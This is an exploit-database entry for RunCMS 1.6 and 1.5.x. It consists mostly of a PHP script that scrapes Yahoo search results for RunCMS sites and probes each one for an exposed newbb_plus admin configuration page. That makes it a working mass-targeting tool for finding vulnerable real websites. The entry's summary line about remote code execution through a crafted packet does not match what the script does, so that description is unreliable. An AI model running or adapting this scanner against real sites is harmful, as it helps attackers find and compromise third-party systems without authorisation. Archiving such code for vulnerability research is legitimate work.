RunCms`s Bug Yahoo! Crawler

vendor:

RunCms

by:

trueend5

7.5

CVSS

HIGH

Remote Code Execution

Unknown

CWE

Product Name: RunCms

Affected Version From: RunCMS 1.6 Halloween, 1.5.x

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:runcms:runcms:1.6_halloween

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

RunCms`s Bug Yahoo! Crawler

The RunCms software is vulnerable to remote code execution due to a bug in the Yahoo! Crawler. This vulnerability allows an attacker to execute arbitrary code on the target system by sending a specially crafted packet.

Mitigation:

Update to a non-vulnerable version of RunCms.

Source

Exploit-DB raw data:

<?php
########################## WwW.BugReport.ir ###########################################
#
#      AmnPardaz Security Research & Penetration Testing Group
#
# Title: RunCms`s Bug Yahoo! Crawler
# Vendor: http://www.runcms.org/
# Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
# Exploitation: Remote with browser
# Coded By: trueend5 (trueend5 yahoo com)
#######################################################################################
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Contact : admin@bugreport.ir
######################## Bug Description ###########################
?>

<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>RunCms`s Bug Yahoo! Crawler</title>
<style type="text/css" media="screen">
body {
	font-size: 10px;
	font-family: verdana;
}
INPUT {
	BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000">
<form action="?" method="post">
Run the Exploit And Use the results of "Yahoo! Search Engine" starting From the page:
<input type="text" name="StartPage" value="1" size="3">
including
<input type="text" name="PerPage" value="100" size="3">
results per page.<BR><BR>
<input type="submit" name="Start" value="Start">
</form>
<?php

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);


function sendpacket($packet)
{
	global $host, $html;
	$port  = 80;
		
	$ock=fsockopen(gethostbyname($host),$port);
    if ($ock)
	{
		fputs($ock,$packet);
		$html='';
		while (!feof($ock))
		{
			$html.=fgets($ock);
		}
		fclose($ock);
		// echo nl2br(htmlentities($html));
    }else echo '<BR>No response from '.htmlentities($host).'<BR>';
}

	// Start
	if(isset($_POST['Start'] ,$_POST['StartPage'] ,$_POST['PerPage']))
	{
		$StartPage = ((intval($_POST['StartPage'])) > 0) ? intval($_POST['StartPage']) : 1;
		$PerPage   = ((intval($_POST['PerPage'])) <= 100) ? intval($_POST['PerPage']) : 100;
		if (($StartPage*$PerPage) > 1000)
		{
			echo "Yahoo! Search doesn't show More than 1000 Results per query"."<BR>";
			die();
		}
		echo 'Trying to obtain URLs Which are suspected to "newbb_plus disclaimer.php
		 File Overwrite" ...'.'<BR>';
		
		$Yahoo     = "search.yahoo.com";
		$S         = $StartPage;
		$P         = $PerPage;
		
		for ($S; $S*$P < 1000; $S++)
		{
			$host    = $Yahoo;
			$B       = ($S == 1) ? '' : '&b='.((($S-1)*$P)+1);
			$Query   = "/search?p=runcms+inurl%3A%22%2Fmodules%2Fnews%2F%22&n=$P&ei=utf-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=url&vd=all&vst=0&vf=all&vm=p&fl=0&xargs=0&pstart=1".$B;
			
			$packet  = "GET ".$Query." HTTP/1.1\r\n";
			$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
			$packet .= "Host: ".$host."\r\n";
			$packet .= "Connection: Close\r\n\r\n";
			sendpacket($packet);
			if(stristr($html , '403 Forbidden') === false 
			&& stristr($html , '302 Moved') === false)
			{
				echo '<HR><BR><CENTER>Obtained URLs From Page:'.($S).'<CENTER><BR>';
				$Pattern = '/href="http:\/\/?([^\/]+)?(\/[a-zA-Z]+)?(\/modules\/news\/)/i';
				preg_match_all($Pattern, $html, $Matches);
				$TotalLinks = count($Matches[1]);
				echo "In Progress<BR>";
				for ($I=0; $I < $TotalLinks; $I++)
				{
					echo ".";
					if ($Matches[2][$I] == '')
					{
						$Path = "/modules/newbb_plus/admin/forum_config.php";
					}else 
					$Path    = $Matches[2][$I]."/modules/newbb_plus/admin/forum_config.php";
					$host    = $Matches[1][$I];
					$packet  = "GET ".$Path." HTTP/1.1\r\n";
					$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
					$packet .= "Host: ".$host."\r\n";
					$packet .= "Connection: Close\r\n\r\n";
					sendpacket($packet);
					if(stristr($html , '_MD_A_CONFIGFORUM') !== false)
					{
						echo "<BR><A href='http://".$host.$Path."'>".$host.$Path."</A><BR>";
					}					
				}
			}else 
			{
				echo '<BR>'.'Yahoo! finds out that this in an automated request
				 from a malware! So try again after awhile!';
				die();
			}
		}
	}
?>
</body>
</html>

# milw0rm.com [2007-11-25]